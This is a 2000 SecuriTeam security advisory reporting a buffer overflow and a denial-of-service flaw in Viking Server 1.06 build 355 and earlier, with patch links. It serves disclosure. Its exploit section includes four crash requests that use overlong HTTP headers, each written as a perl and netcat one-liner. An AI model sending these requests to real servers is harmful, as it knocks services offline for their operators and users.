[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
 
 discussions
- read forum
- new topic
- search
 

 meetings
- meetings list
- recent additions
- add your info
 
 top 100 sites
- visit top sites
- sign up now
- members
 
 webmasters

- add your url
- add domain
- search box
- link to us

 
 projects
- our projects
- free email
 
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : Remote code execution in Viking Server

Title: Remote code execution in Viking Server
Released by: SecuriTeam
Date: 28th August 2000
Printable version: Click here


SUMMARY



 <http://www.robtex.com/viking/> Viking Server is a multi-protocol

Internet server/proxy for Windows 95/NT that supports a wide range of

protocols such as HTTP, FTP, SOCKS, DNS, TELNET, SMTP, POP3, UUCP, FCP,

ICP, etc. Unfortunately it does not perform proper buffer bounds checking,

enabling attackers to launch a buffer overflow attack and possibly execute

arbitrary code. Also, an incorrect parsing of non-date data causes an

exception, enabling remote attackers to cause a Denial of Service attack

against the product.



DETAILS



Vulnerable systems:

Viking 1.06 build 355 and prior



Immune systems:

Viking 1.06 build 370 and above



Exploit:

Any of the following HTTP commands will crash the server:



(1)

GET [x11765] HTTP/1.1



(Cmd: perl -e "print \"GET @{['x'x11765]} HTTP/1.1\n\n\""|nc 127.1 80)



(2)

GET / HTTP/1.1

Unless-Modified-Since: [x14765]



(Cmd: perl -e "print \"GET / HTTP/1.1\nUnless-Modified-Since:

@{['x'x14765]}\n\n\""|nc 127.1 80)



(3)

GET / HTTP/1.1

If-Range: [x14765]



(Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Range: @{['x'x14765]}\n\n\""|nc

127.1 80)



(4)

GET / HTTP/1.1

If-Modified-Since: [x14765]



(Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Modified-Since:

@{['x'x14765]}\n\n\""|nc 127.1 80)



Patch:

Robotex has responded immediately and released a patch that deals with

these issues.

You can download the patch at:

http://ftp.robtex.com/robtex/viking/beta/viking.zip

http://www.robtex.com/files/viking/beta/viking.zip





====================

DISCLAIMER:

The information in this bulletin is provided "AS IS" without warranty of any

kind.

In no event shall we be liable for any damages whatsoever including direct,

indirect, incidental, consequential, loss of business profits or special

damages.

====================



--

Aviram Jenik

Beyond Security Ltd.

http://www.BeyondSecurity.com

http://www.SecuriTeam.com








(C) 1999-2000 All rights reserved.